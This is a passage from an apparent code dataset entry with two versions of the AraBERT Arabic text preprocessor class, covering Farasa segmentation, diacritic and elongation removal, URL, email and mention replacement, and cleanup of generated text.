text)\n text = ' '.join(text.replace('️', '').split())\n if (self.model_name == 'bert-base-arabertv2' or self.model_name ==\n 'bert-large-arabertv2'):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = ' '.join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. 
Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n text = re.sub(white_spaced_double_quotation_regex, '\"' + '\\\\1' +\n '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + '\\\\1' +\n \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\`' + '\\\\1' +\n '\\\\`', text)\n text = re.sub(white_spaced_back_quotation_regex, '\\\\—' + '\\\\1' +\n '\\\\—', text)\n text = text.replace('.', ' . ')\n text = ' '.join(text.split())\n text = re.sub('(\\\\d+) \\\\. (\\\\d+)', '\\\\1.\\\\2', text)\n text = re.sub('(\\\\d+) \\\\, (\\\\d+)', '\\\\1,\\\\2', text)\n text = re.sub(left_and_right_spaced_chars, '\\\\1', text)\n text = re.sub(left_spaced_chars, '\\\\1', text)\n text = re.sub(right_spaced_chars, '\\\\1', text)\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace('+ ', '+')\n text = text.replace(' +', '+')\n text = ' '.join([self._desegmentword(word) for word in text.split(' ')]\n )\n return text\n\n def _desegmentword(self, orig_word: str) ->str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace('ل+ال+', 'لل')\n if 'ال+ال' not in orig_word:\n word = word.replace('ل+ال', 'لل')\n word = word.replace('+', '')\n word = word.replace('للل', 'لل')\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n text = re.sub('\\\\d+\\\\/[ء-ي]+\\\\/\\\\d+\\\\]', '', text)\n text = re.sub('ـ', '', text)\n text = re.sub('[«»]', ' \" ', text)\n if self.replace_urls_emails_mentions:\n text = re.sub(regex_url_step1, '[رابط]', text)\n text = re.sub(regex_url_step2, '[رابط]', text)\n text = re.sub(regex_url, '[رابط]', text)\n text = re.sub(regex_email, '[بريد]', text)\n text = re.sub(regex_mention, '[مستخدم]', text)\n text = re.sub('…', '\\\\.', text).strip()\n text = self._remove_redundant_punct(text)\n if self.replace_urls_emails_mentions:\n text = re.sub('\\\\[ رابط \\\\]|\\\\[ رابط\\\\]|\\\\[رابط \\\\]',\n ' [رابط] ', text)\n text = re.sub('\\\\[ بريد \\\\]|\\\\[ بريد\\\\]|\\\\[بريد \\\\]',\n ' [بريد] ', text)\n text = re.sub('\\\\[ مستخدم \\\\]|\\\\[ مستخدم\\\\]|\\\\[مستخدم \\\\]',\n ' [مستخدم] ', text)\n if self.remove_elongation:\n text = self._remove_elongation(text)\n if self.insert_white_spaces:\n text = re.sub('([^0-9ء-غف-٩ٱ-ٳa-zA-Z\\\\[\\\\]])', ' \\\\1 ', text)\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n if '+' not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n 
return ' '.join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = ''\n for i, c in enumerate(word):\n if c == '+':\n if temp_token == 'ك':\n if i == 1:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif word[i - 2] == '+':\n if segmented_word[-1][-1] == '+':\n segmented_word.append(temp_token + '+')\n temp_token = ''\n else:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + '+')\n temp_token = ''\n elif temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n temp_token = ''\n else:\n segmented_word.append(temp_token)\n temp_token = ''\n continue\n temp_token += c\n if temp_token != '':\n if temp_token in suffix_list:\n segmented_word.append('+' + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n if self.keep_emojis:\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI['en'].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in ['[', ']']:\n continue\n if word in ['رابط', 'بريد', 'مستخدم'] and line_farasa[index - 1\n ] in ['[', ']']:\n segmented_line.append('[' + word + ']')\n continue\n segmented_word = []\n for token in word.split('+'):\n if token in prefix_list:\n segmented_word.append(token + '+')\n elif token in suffix_list:\n segmented_word.append('+' + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return ' '.join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = re.sub(elongation_pattern, elongation_replacement,\n text, flags=re.MULTILINE)\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = ' ' + ''.join(list(sub)) + ' '\n text = ''.join((text[:result.span()[0] + dif], sub, text[result\n .span()[1] + dif:]))\n text_ = ''.join((text_[:result.span()[0]], text_[result.span()[\n 1]:])).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub('\\\\s+', ' ', text)\n return text.strip()\n\n\nprefix_list = ['ال', 'و', 'ف', 'ب', 'ك', 'ل', 'لل', 'ال', 'و', 'ف', 'ب',\n 'ك', 'ل', 'لل', 'س']\nsuffix_list = ['ه', 'ها', 'ك', 'ي', 'هما', 'كما', 'نا', 'كم', 'هم', 'هن',\n 'كن', 'ا', 'ان', 'ين', 'ون', 'وا', 'ات', 'ت', 'ن', 'ة', 'ه', 'ها', 'ك',\n 'ي', 'هما', 'كما', 'نا', 'كم', 'هم', 'هن', 'كن', 'ا', 'ان', 'ين', 'ون',\n 'وا', 'ات', 'ت', 'ن', 'ة']\nother_tokens = ['[رابط]', '[مستخدم]', '[بريد]']\nprefix_symbols = [(x + '+') for x in prefix_list]\nsuffix_symblos = [('+' + x) for x in suffix_list]\nnever_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))\nurl_regexes = [\n 
'(http(s)?:\\\\/\\\\/.)?(www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{2,256}\\\\.[a-z]{2,6}\\\\b([-a-zA-Z0-9@:%_\\\\+.~#?&//=]*)'\n , '@(https?|ftp)://(-\\\\.)?([^\\\\s/?\\\\.#-]+\\\\.?)+(/[^\\\\s]*)?$@iS',\n 'http[s]?://[a-zA-Z0-9_\\\\-./~\\\\?=%&]+', 'www[a-zA-Z0-9_\\\\-?=%&/.~]+',\n '[a-zA-Z]+\\\\.com', '(?=http)[^\\\\s]+', '(?=www)[^\\\\s]+', '://']\nuser_mention_regex = '@[\\\\w\\\\d]+'\nemail_regexes = ['[\\\\w-]+@([\\\\w-]+\\\\.)+[\\\\w-]+', '\\\\S+@\\\\S+']\nredundant_punct_pattern = (\n '([!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ【»؛\\\\s+«–…‘]{2,})'\n )\nregex_tatweel = '(\\\\D)\\\\1{2,}'\nrejected_chars_regex = (\n '[^0-9\\\\u0621-\\\\u063A\\\\u0640-\\\\u066C\\\\u0671-\\\\u0674a-zA-Z\\\\[\\\\]!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ»؛\\\\s+«–…‘]'\n )\nregex_url_step1 = '(?=http)[^\\\\s]+'\nregex_url_step2 = '(?=www)[^\\\\s]+'\nregex_url = (\n '(http(s)?:\\\\/\\\\/.)?(www\\\\.)?[-a-zA-Z0-9@:%._\\\\+~#=]{2,256}\\\\.[a-z]{2,6}\\\\b([-a-zA-Z0-9@:%_\\\\+.~#?&//=]*)'\n )\nregex_mention = '@[\\\\w\\\\d]+'\nregex_email = '\\\\S+@\\\\S+'\nchars_regex = (\n '0-9\\\\u0621-\\\\u063A\\\\u0640-\\\\u066C\\\\u0671-\\\\u0674a-zA-Z\\\\[\\\\]!\\\\\"#\\\\$%\\\\\\'\\\\(\\\\)\\\\*\\\\+,\\\\.:;\\\\-<=·>?@\\\\[\\\\\\\\\\\\]\\\\^_ـ`{\\\\|}~—٪’،؟`୍“؛”ۚ»؛\\\\s+«–…‘'\n )\nwhite_spaced_double_quotation_regex = '\\\\\"\\\\s+([^\"]+)\\\\s+\\\\\"'\nwhite_spaced_single_quotation_regex = \"\\\\'\\\\s+([^']+)\\\\s+\\\\'\"\nwhite_spaced_back_quotation_regex = '\\\\`\\\\s+([^`]+)\\\\s+\\\\`'\nwhite_spaced_em_dash = '\\\\—\\\\s+([^—]+)\\\\s+\\\\—'\nleft_spaced_chars = ' ([\\\\]!#\\\\$%\\\\),\\\\.:;\\\\?}٪’،؟”؛…»·])'\nright_spaced_chars = '([\\\\[\\\\(\\\\{“«‘*\\\\~]) '\nleft_and_right_spaced_chars = ' ([\\\\+\\\\-\\\\<\\\\=\\\\>\\\\@\\\\\\\\\\\\^\\\\_\\\\|\\\\–]) '\n",
"step-5": "import html\nimport logging\nimport re\n\nimport pyarabic.araby as araby\n\nACCEPTED_MODELS = [\n \"bert-base-arabertv01\",\n \"bert-base-arabert\",\n \"bert-base-arabertv02\",\n \"bert-base-arabertv2\",\n \"bert-large-arabertv02\",\n \"bert-large-arabertv2\",\n \"araelectra-base\",\n \"araelectra-base-discriminator\",\n \"araelectra-base-generator\",\n \"aragpt2-base\",\n \"aragpt2-medium\",\n \"aragpt2-large\",\n \"aragpt2-mega\",\n]\n\nSEGMENTED_MODELS = [\n \"bert-base-arabert\",\n \"bert-base-arabertv2\",\n \"bert-large-arabertv2\",\n]\n\n\nclass ArbertmoPreprocessor:\n \"\"\"\n A Preprocessor class that cleans and preprocesses text for all models in the AraBERT repo.\n It also can unprocess the text ouput of the generated text\n\n Args:\n\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n\n Returns:\n\n ArBERTMoPreprocessor: the preprocessor class\n\n Example:\n\n from preprocess import ArBERTMoPreprocessor\n\n arabert_prep = ArBERTMoPreprocessor(\"aubmindlab/bert-base-arabertv2\")\n\n arabert_prep.preprocess(\"SOME ARABIC TEXT\")\n \"\"\"\n\n def __init__(\n self,\n model_name,\n keep_emojis=False,\n remove_html_markup=True,\n replace_urls_emails_mentions=True,\n strip_tashkeel=True,\n strip_tatweel=True,\n insert_white_spaces=True,\n remove_elongation=True,\n ):\n \"\"\"\n model_name (:obj:`str`): model name from the HuggingFace Models page without the aubmindlab tag. Defaults to \"bert-base-arabertv02\". 
Current accepted models are:\n\n - :obj:`\"bert-base-arabertv01\"`: No farasa segmentation.\n - :obj:`\"bert-base-arabert\"`: with farasa segmentation.\n - :obj:`\"bert-base-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-base-arabertv2\"`: with farasa segmentation.\n - :obj:`\"bert-large-arabertv02\"`: No farasas egmentation.\n - :obj:`\"bert-large-arabertv2\"`: with farasa segmentation.\n - :obj:`\"araelectra-base\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-discriminator\"`: No farasa segmentation.\n - :obj:`\"araelectra-base-generator\"`: No farasa segmentation.\n - :obj:`\"aragpt2-base\"`: No farasa segmentation.\n - :obj:`\"aragpt2-medium\"`: No farasa segmentation.\n - :obj:`\"aragpt2-large\"`: No farasa segmentation.\n - :obj:`\"aragpt2-mega\"`: No farasa segmentation.\n\n keep_emojis(:obj: `bool`): don't remove emojis while preprocessing. Defaults to False\n\n remove_html_markup(:obj: `bool`): Whether to remove html artfacts, should be set to False when preprocessing TyDi QA. Defaults to True\n\n replace_urls_emails_mentions(:obj: `bool`): Whether to replace email urls and mentions by special tokens. Defaults to True\n\n strip_tashkeel(:obj: `bool`): remove diacritics (FATHATAN, DAMMATAN, KASRATAN, FATHA, DAMMA, KASRA, SUKUN, SHADDA)\n\n strip_tatweel(:obj: `bool`): remove tatweel '\\\\u0640'\n\n insert_white_spaces(:obj: `bool`): insert whitespace before and after all non Arabic digits or English digits or Arabic and English Alphabet or the 2 brackets, then inserts whitespace between words and numbers or numbers and words\n\n remove_elongation(:obj: `bool`): replace repetition of more than 2 non-digit character with 2 of this character\n\n \"\"\"\n model_name = model_name.replace(\"aubmindlab/\", \"\")\n\n if model_name not in ACCEPTED_MODELS:\n logging.warning(\n \"Model provided is not in the accepted model list. Assuming you don't want Farasa Segmentation\"\n )\n self.model_name = \"bert-base-arabertv02\"\n else:\n self.model_name = model_name\n\n if self.model_name in SEGMENTED_MODELS:\n logging.info(\n \"Selected Model requires pre-segmentation, Initializing FarasaSegmenter\"\n )\n try:\n from farasa.segmenter import FarasaSegmenter\n\n self.farasa_segmenter = FarasaSegmenter(interactive=True)\n except:\n logging.warning(\n \"farasapy is not installed, you want be able to process text for AraBERTv1 and v2. 
Install it using: pip install farasapy\"\n )\n else:\n logging.info(\n \"Selected Model doesn't require pre-segmentation, skipping FarasaSegmenter initialization\"\n )\n\n self.keep_emojis = keep_emojis\n if self.keep_emojis:\n import emoji\n\n self.emoji = emoji\n if self.model_name in SEGMENTED_MODELS:\n logging.warning(\n \"Keeping tweets with Farasa Segmentation is 10 times slower\"\n )\n\n self.remove_html_markup = remove_html_markup\n self.replace_urls_emails_mentions = replace_urls_emails_mentions\n self.strip_tashkeel = strip_tashkeel\n self.strip_tatweel = strip_tatweel\n self.insert_white_spaces = insert_white_spaces\n self.remove_elongation = remove_elongation\n\n def preprocess(self, text):\n \"\"\"\n Preprocess takes an input text line an applies the same preprocessing used in AraBERT\n pretraining\n\n Args:\n\n text (:obj:`str`): inout text string\n\n Returns:\n\n string: A preprocessed string depending on which model was selected\n \"\"\"\n if self.model_name == \"bert-base-arabert\":\n return self._old_preprocess(\n text,\n do_farasa_tokenization=True,\n )\n\n if self.model_name == \"bert-base-arabertv01\":\n return self._old_preprocess(text, do_farasa_tokenization=False)\n\n text = str(text)\n text = html.unescape(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n if self.strip_tatweel:\n text = araby.strip_tatweel(text)\n\n if self.replace_urls_emails_mentions:\n # replace all possible URLs\n for reg in url_regexes:\n text = re.sub(reg, \" [رابط] \", text)\n # REplace Emails with [بريد]\n for reg in email_regexes:\n text = re.sub(reg, \" [بريد] \", text)\n # replace mentions with [مستخدم]\n text = re.sub(user_mention_regex, \" [مستخدم] \", text)\n\n if self.remove_html_markup:\n # remove html line breaks\n text = re.sub(\"<br />\", \" \", text)\n # remove html markup\n text = re.sub(\"</?[^>]+>\", \" \", text)\n\n # remove repeated characters >2\n if self.remove_elongation:\n text = self._remove_elongation(text)\n\n # insert whitespace before and after all non Arabic digits or English Digits and Alphabet and the 2 brackets\n if self.insert_white_spaces:\n text = re.sub(\n \"([^0-9\\u0621-\\u063A\\u0641-\\u064A\\u0660-\\u0669a-zA-Z\\[\\]])\",\n r\" \\1 \",\n text,\n )\n\n # insert whitespace between words and numbers or numbers and words\n text = re.sub(\n \"(\\d+)([\\u0621-\\u063A\\u0641-\\u064A\\u0660-\\u066C]+)\", r\" \\1 \\2 \", text\n )\n text = re.sub(\n \"([\\u0621-\\u063A\\u0641-\\u064A\\u0660-\\u066C]+)(\\d+)\", r\" \\1 \\2 \", text\n )\n\n # remove unwanted characters\n if self.keep_emojis:\n emoji_regex = \"\".join(list(self.emoji.UNICODE_EMOJI[\"en\"].keys()))\n rejected_chars_regex2 = \"[^%s%s]\" % (chars_regex, emoji_regex)\n text = re.sub(rejected_chars_regex2, \" \", text)\n else:\n text = re.sub(rejected_chars_regex, \" \", text)\n\n # remove extra spaces\n text = \" \".join(text.replace(\"\\uFE0F\", \"\").split())\n\n if (\n self.model_name == \"bert-base-arabertv2\"\n or self.model_name == \"bert-large-arabertv2\"\n ):\n if self.keep_emojis:\n new_text = []\n for word in text.split():\n if word in list(self.emoji.UNICODE_EMOJI[\"en\"].keys()):\n new_text.append(word)\n else:\n new_text.append(self.farasa_segmenter.segment(word))\n text = \" \".join(new_text)\n else:\n text = self.farasa_segmenter.segment(text)\n return self._farasa_segment(text)\n\n # ALl the other models dont require Farasa Segmentation\n return text\n\n def unpreprocess(self, text, desegment=True):\n \"\"\"Re-formats the text to a classic format where punctuations, 
brackets, parenthesis are not seperated by whitespaces.\n The objective is to make the generated text of any model appear natural and not preprocessed.\n\n Args:\n text (str): input text to be un-preprocessed\n desegment (bool, optional): [whether or not to remove farasa pre-segmentation before]. Defaults to True.\n\n Returns:\n str: The unpreprocessed (and possibly Farasa-desegmented) text.\n \"\"\"\n\n if self.model_name in SEGMENTED_MODELS and desegment:\n text = self.desegment(text)\n\n # removes the spaces around quotation marks ex: i \" ate \" an apple --> i \"ate\" an apple\n # https://stackoverflow.com/a/53436792/5381220\n text = re.sub(white_spaced_double_quotation_regex, '\"' + r\"\\1\" + '\"', text)\n text = re.sub(white_spaced_single_quotation_regex, \"'\" + r\"\\1\" + \"'\", text)\n text = re.sub(white_spaced_back_quotation_regex, \"\\`\" + r\"\\1\" + \"\\`\", text)\n text = re.sub(white_spaced_back_quotation_regex, \"\\—\" + r\"\\1\" + \"\\—\", text)\n\n # during generation, sometimes the models don't put a space after the dot, this handles it\n text = text.replace(\".\", \" . \")\n text = \" \".join(text.split())\n\n # handle decimals\n text = re.sub(r\"(\\d+) \\. (\\d+)\", r\"\\1.\\2\", text)\n text = re.sub(r\"(\\d+) \\, (\\d+)\", r\"\\1,\\2\", text)\n\n text = re.sub(left_and_right_spaced_chars, r\"\\1\", text)\n text = re.sub(left_spaced_chars, r\"\\1\", text)\n text = re.sub(right_spaced_chars, r\"\\1\", text)\n\n return text\n\n def desegment(self, text):\n \"\"\"\n Use this function if sentence tokenization was done using\n `from arabert.preprocess_arabert import preprocess` with Farasa enabled\n AraBERT segmentation using Farasa adds a space after the '+' for prefixes,\n and after before the '+' for suffixes\n\n Example:\n >>> desegment('ال+ دراس +ات')\n الدراسات\n \"\"\"\n text = text.replace(\"+ \", \"+\")\n text = text.replace(\" +\", \"+\")\n text = \" \".join([self._desegmentword(word) for word in text.split(\" \")])\n return text\n\n def _desegmentword(self, orig_word: str) -> str:\n \"\"\"\n Word segmentor that takes a Farasa Segmented Word and removes the '+' signs\n\n Example:\n >>> _desegmentword(\"ال+يومي+ة\")\n اليومية\n \"\"\"\n word = orig_word.replace(\"ل+ال+\", \"لل\")\n if \"ال+ال\" not in orig_word:\n word = word.replace(\"ل+ال\", \"لل\")\n word = word.replace(\"+\", \"\")\n word = word.replace(\"للل\", \"لل\")\n return word\n\n def _old_preprocess(self, text, do_farasa_tokenization):\n \"\"\"\n AraBERTv1 preprocessing Function\n \"\"\"\n text = str(text)\n if self.strip_tashkeel:\n text = araby.strip_tashkeel(text)\n\n text = re.sub(r\"\\d+\\/[ء-ي]+\\/\\d+\\]\", \"\", text)\n text = re.sub(\"ـ\", \"\", text)\n text = re.sub(\"[«»]\", ' \" ', text)\n\n if self.replace_urls_emails_mentions:\n # replace the [رابط] token with space if you want to clean links\n text = re.sub(regex_url_step1, \"[رابط]\", text)\n text = re.sub(regex_url_step2, \"[رابط]\", text)\n text = re.sub(regex_url, \"[رابط]\", text)\n text = re.sub(regex_email, \"[بريد]\", text)\n text = re.sub(regex_mention, \"[مستخدم]\", text)\n text = re.sub(\"…\", r\"\\.\", text).strip()\n text = self._remove_redundant_punct(text)\n\n if self.replace_urls_emails_mentions:\n text = re.sub(r\"\\[ رابط \\]|\\[ رابط\\]|\\[رابط \\]\", \" [رابط] \", text)\n text = re.sub(r\"\\[ بريد \\]|\\[ بريد\\]|\\[بريد \\]\", \" [بريد] \", text)\n text = re.sub(r\"\\[ مستخدم \\]|\\[ مستخدم\\]|\\[مستخدم \\]\", \" [مستخدم] \", text)\n\n if self.remove_elongation:\n text = self._remove_elongation(text)\n\n if 
self.insert_white_spaces:\n text = re.sub(\n \"([^0-9\\u0621-\\u063A\\u0641-\\u0669\\u0671-\\u0673a-zA-Z\\[\\]])\",\n r\" \\1 \",\n text,\n )\n if do_farasa_tokenization:\n text = self._tokenize_arabic_words_farasa(text)\n\n return text.strip()\n\n def _farasa_segment(self, text):\n line_farasa = text.split()\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in [\"[\", \"]\"]:\n continue\n if word in [\"رابط\", \"بريد\", \"مستخدم\"] and line_farasa[index - 1] in [\n \"[\",\n \"]\",\n ]:\n segmented_line.append(\"[\" + word + \"]\")\n continue\n if \"+\" not in word:\n segmented_line.append(word)\n continue\n segmented_word = self._split_farasa_output(word)\n segmented_line.extend(segmented_word)\n\n return \" \".join(segmented_line)\n\n def _split_farasa_output(self, word):\n segmented_word = []\n temp_token = \"\"\n for i, c in enumerate(word):\n if c == \"+\":\n # if the token is KAF, it could be a suffix or prefix\n if temp_token == \"ك\":\n # if we are at the second token, then KAF is surely a prefix\n if i == 1:\n segmented_word.append(temp_token + \"+\")\n temp_token = \"\"\n # If the KAF token is between 2 tokens\n elif word[i - 2] == \"+\":\n # if the previous token is prefix, then this KAF must be a prefix\n if segmented_word[-1][-1] == \"+\":\n segmented_word.append(temp_token + \"+\")\n temp_token = \"\"\n # else it is a suffix, this KAF could not be a second suffix\n else:\n segmented_word.append(\"+\" + temp_token)\n temp_token = \"\"\n # if Kaf is at the end, this is handled with the statement after the loop\n elif temp_token in prefix_list:\n segmented_word.append(temp_token + \"+\")\n temp_token = \"\"\n elif temp_token in suffix_list:\n segmented_word.append(\"+\" + temp_token)\n temp_token = \"\"\n else:\n segmented_word.append(temp_token)\n temp_token = \"\"\n continue\n temp_token += c\n if temp_token != \"\":\n if temp_token in suffix_list:\n segmented_word.append(\"+\" + temp_token)\n else:\n segmented_word.append(temp_token)\n return segmented_word\n\n def _tokenize_arabic_words_farasa(self, line_input):\n\n if self.keep_emojis:\n # insert whitespace before and after all non Arabic digits or English Digits and Alphabet and the 2 brackets\n line_farasa = []\n for word in line_input.split():\n if word in list(self.emoji.UNICODE_EMOJI[\"en\"].keys()):\n line_farasa.append(word)\n else:\n line_farasa.append(self.farasa_segmenter.segment(word))\n else:\n line_farasa = self.farasa_segmenter.segment(line_input).split()\n\n segmented_line = []\n for index, word in enumerate(line_farasa):\n if word in [\"[\", \"]\"]:\n continue\n if word in [\"رابط\", \"بريد\", \"مستخدم\"] and line_farasa[index - 1] in [\n \"[\",\n \"]\",\n ]:\n segmented_line.append(\"[\" + word + \"]\")\n continue\n segmented_word = []\n for token in word.split(\"+\"):\n if token in prefix_list:\n segmented_word.append(token + \"+\")\n elif token in suffix_list:\n segmented_word.append(\"+\" + token)\n else:\n segmented_word.append(token)\n segmented_line.extend(segmented_word)\n return \" \".join(segmented_line)\n\n def _remove_elongation(self, text):\n \"\"\"\n :param text: the input text to remove elongation\n :return: delongated text\n \"\"\"\n # loop over the number of times the regex matched the text\n for index_ in range(len(re.findall(regex_tatweel, text))):\n elongation = re.search(regex_tatweel, text)\n if elongation:\n elongation_pattern = elongation.group()\n elongation_replacement = elongation_pattern[0]\n elongation_pattern = re.escape(elongation_pattern)\n text = 
re.sub(\n elongation_pattern, elongation_replacement, text, flags=re.MULTILINE\n )\n else:\n break\n return text\n\n def _remove_redundant_punct(self, text):\n text_ = text\n result = re.search(redundant_punct_pattern, text)\n dif = 0\n while result:\n sub = result.group()\n sub = sorted(set(sub), key=sub.index)\n sub = \" \" + \"\".join(list(sub)) + \" \"\n text = \"\".join(\n (text[: result.span()[0] + dif], sub, text[result.span()[1] + dif :])\n )\n text_ = \"\".join(\n (text_[: result.span()[0]], text_[result.span()[1] :])\n ).strip()\n dif = abs(len(text) - len(text_))\n result = re.search(redundant_punct_pattern, text_)\n text = re.sub(r\"\\s+\", \" \", text)\n return text.strip()\n\n\nprefix_list = [\n \"ال\",\n \"و\",\n \"ف\",\n \"ب\",\n \"ك\",\n \"ل\",\n \"لل\",\n \"\\u0627\\u0644\",\n \"\\u0648\",\n \"\\u0641\",\n \"\\u0628\",\n \"\\u0643\",\n \"\\u0644\",\n \"\\u0644\\u0644\",\n \"س\",\n]\nsuffix_list = [\n \"ه\",\n \"ها\",\n \"ك\",\n \"ي\",\n \"هما\",\n \"كما\",\n \"نا\",\n \"كم\",\n \"هم\",\n \"هن\",\n \"كن\",\n \"ا\",\n \"ان\",\n \"ين\",\n \"ون\",\n \"وا\",\n \"ات\",\n \"ت\",\n \"ن\",\n \"ة\",\n \"\\u0647\",\n \"\\u0647\\u0627\",\n \"\\u0643\",\n \"\\u064a\",\n \"\\u0647\\u0645\\u0627\",\n \"\\u0643\\u0645\\u0627\",\n \"\\u0646\\u0627\",\n \"\\u0643\\u0645\",\n \"\\u0647\\u0645\",\n \"\\u0647\\u0646\",\n \"\\u0643\\u0646\",\n \"\\u0627\",\n \"\\u0627\\u0646\",\n \"\\u064a\\u0646\",\n \"\\u0648\\u0646\",\n \"\\u0648\\u0627\",\n \"\\u0627\\u062a\",\n \"\\u062a\",\n \"\\u0646\",\n \"\\u0629\",\n]\nother_tokens = [\"[رابط]\", \"[مستخدم]\", \"[بريد]\"]\n\n# the never_split list is ussed with the transformers library\nprefix_symbols = [x + \"+\" for x in prefix_list]\nsuffix_symblos = [\"+\" + x for x in suffix_list]\nnever_split_tokens = list(set(prefix_symbols + suffix_symblos + other_tokens))\n\nurl_regexes = [\n r\"(http(s)?:\\/\\/.)?(www\\.)?[-a-zA-Z0-9@:%._\\+~#=]{2,256}\\.[a-z]{2,6}\\b([-a-zA-Z0-9@:%_\\+.~#?&//=]*)\",\n r\"@(https?|ftp)://(-\\.)?([^\\s/?\\.#-]+\\.?)+(/[^\\s]*)?$@iS\",\n r\"http[s]?://[a-zA-Z0-9_\\-./~\\?=%&]+\",\n r\"www[a-zA-Z0-9_\\-?=%&/.~]+\",\n r\"[a-zA-Z]+\\.com\",\n r\"(?=http)[^\\s]+\",\n r\"(?=www)[^\\s]+\",\n r\"://\",\n]\nuser_mention_regex = r\"@[\\w\\d]+\"\nemail_regexes = [r\"[\\w-]+@([\\w-]+\\.)+[\\w-]+\", 